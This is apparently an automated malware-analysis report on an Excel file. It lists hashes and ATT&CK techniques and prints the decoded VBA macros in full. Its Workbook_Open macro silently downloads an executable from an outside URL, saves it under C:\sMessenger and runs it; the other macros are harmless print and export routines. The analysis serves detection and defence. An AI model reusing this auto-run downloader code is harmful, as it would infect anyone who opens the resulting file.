Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 606f910155b944db…

MALICIOUS

Office (OLE)

84.5 KB Created: 2012-02-23 01:02:54 Authoring application: Microsoft Excel First seen: 2015-08-03
MD5: cc5d41758cb290b088a0dba67c20dadb SHA-1: e792aa7209ca10acd91d1fc4aeb65384888cd004 SHA-256: 606f910155b944dbfca5a4af8775f1f79f4ead9fc8d841c52b424a3f08e2fcf5
230 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an Excel file containing a Workbook_Open VBA macro that attempts to download a second-stage executable from 'http://www.yesform.com/active/searchMessenger/dw.php?mode=etc' and save it as 'C:\sMessenger\searchMessenger_upgrade_x.exe'. The macro then executes this downloaded file. This behavior is indicative of a downloader or droppper malware.

Heuristics 7

  • ClamAV: Doc.Macro.GenericHeuristic-5931846-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5931846-4
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
    • http://ns.adobe.com/xa/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.yesform.com/active/searchMessenger/dw.php?mode=etcIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5334 bytes
SHA-256: e240491647480cebfb818e5df993287928528027110c9b36fda83c16cfeec0bd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    If Dir("C:\sMessenger\searchMessenger.exe") = "" Then
        File_DownLoad "http://www.yesform.com/active/searchMessenger/dw.php?mode=etc", "C:\sMessenger" & "\searchMessenger_upgrade_x.exe"
        Shell "C:\sMessenger\searchMessenger_upgrade_x.exe"
    End If
End Sub

Function File_DownLoad(ByVal SLocalFile As String, ByVal DLocalFile As String) As Boolean
    Dim oXMLHTTP As Object, DFile As Long, oResp() As Byte, FS As Object

    Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    Set FS = CreateObject("Scripting.FileSystemObject")
    oXMLHTTP.Open "GET", SLocalFile, False
    oXMLHTTP.Send
    Do While oXMLHTTP.ReadyState <> 4
        DoEvents
    Loop

    oResp = oXMLHTTP.ResponseBody

    If FS.FolderExists("C:\sMessenger") = False Then MkDir "C:\sMessenger"

    DFile = FreeFile
    If Dir(DLocalFile) <> "" Then Kill DLocalFile

    Open DLocalFile For Binary As #DFile
    Put #DFile, , oResp
    Close #DFile

    Set oXMLHTTP = Nothing
    Set FS = Nothing
End Function

Attribute VB_Name = "etc"
Sub P_preview()
    ActiveSheet.PrintPreview
End Sub

Sub P_out()
    ActiveSheet.PrintOut
End Sub

Sub Sheet2_File()
    Dim PrtRng As Range
    Dim CntNum As Integer
    Dim Strname, FPath As String
    
    Strname = Sheet2.[f4] & "(" & Format(Date, "mmdd") & "_" & Format(Time, "hhmmss") & ")"
    
    Question = MsgBox(Sheet2.[f4] & "을(를) 새로운 파일로 생성하시겠습니까?          " & Chr(13) & "생성된 파일은 '" & Strname & ".xls' 로 생성됩니다. 만약 선택하신 폴더에 동일한 이름의 파일명이 존재한다면 자동으로 덮어씌워집니다." _
                       & Chr(13) & Chr(13) & "저장폴더 선택시 폴더이름은 입력하지 마시고 폴더선택 후 [확인]버튼만 클릭해주세요.", vbQuestion + vbYesNo, Banner)
    If Question = vbYes Then
        Set FD = Application.FileDialog(msoFileDialogFolderPicker)
        With FD
            .Title = "저장폴더 선택"
            If .Show <> 0 Then
                FPath = .SelectedItems(1)
            Else
                Exit Sub
            End If
        End With
        
        Application.ScreenUpdating = False
        
        Sheet2.[b4].Select
        Range(Sheet2.[b4], Sheet2.[t44]).EntireRow.Copy
        
        Workbooks.Add
        
        Rows("1:1").Select
        
        'ActiveSheet.Paste
        Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
        Selection.PasteSpecial Paste:=xlPasteColumnWidths, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
        Selection.PasteSpecial Paste:=xlPasteFormats, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
        Selection.Interior.ColorIndex = xlNone
        Application.CutCopyMode = False
        
        ActiveWindow.DisplayGridlines = False '구분선 숨기기
        ActiveWindow.DisplayZeros = False
        
        'Range(ActiveSheet.[u1], ActiveSheet.[z1]).EntireColumn.Delete
        ActiveSheet.[a1].EntireColumn.Delete
        ActiveSheet.[a1].Select
                       
        Set PrtRng = Range(ActiveSheet.[a1], ActiveSheet.[s41]) '인쇄영역
        ActiveSheet.PageSetup.PrintArea = PrtRng.Address
        
        With ActiveSheet.PageSetup
            '.PrintTitleRows = "$5:$6"
            .Orientation = xlLandscape
            .LeftMargin = Application.InchesToPoints(0.393700787401575)
            .RightMargin = Application.InchesToPoints(0.393700787401575)
            .TopMargin = Application.InchesToPoints(0.393700787401575)
            .BottomMargin = Application.InchesToPoints(0.393700787401575)
            .HeaderMargin = Application.InchesToPoints(0)
            .FooterMargin = Application.InchesToPoints(0)
            .CenterHorizontally = True
            .Zoom = 70
        End With
        
        With ActiveWorkbook
            Application.DisplayAlerts = False
            .SaveAs Filename:=FPath & "\" & Strname
            .Close
            Application.DisplayAlerts = True
        End With
        
        Application.ScreenUpdating = True
        MsgBox "새 파일은" & FPath & "\" & Strname & ".xls' 로 생성되었습니다.", vbInformation, Banner
    End If
    Exit Sub
    
e1:
    MsgBox "생성될 파일과 동일한 이름의 파일이 이미 열려있거나 프로그램 오류로 인하여 생성할 수 없습니다." & Chr(13) & Chr(13) & "파일을 확인하신 후 동일한 이름의 파일이 열려 있을 시 종료하신 후 다시 실행해주세요.", vbInformation, Banner
    Exit Sub
End Sub


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.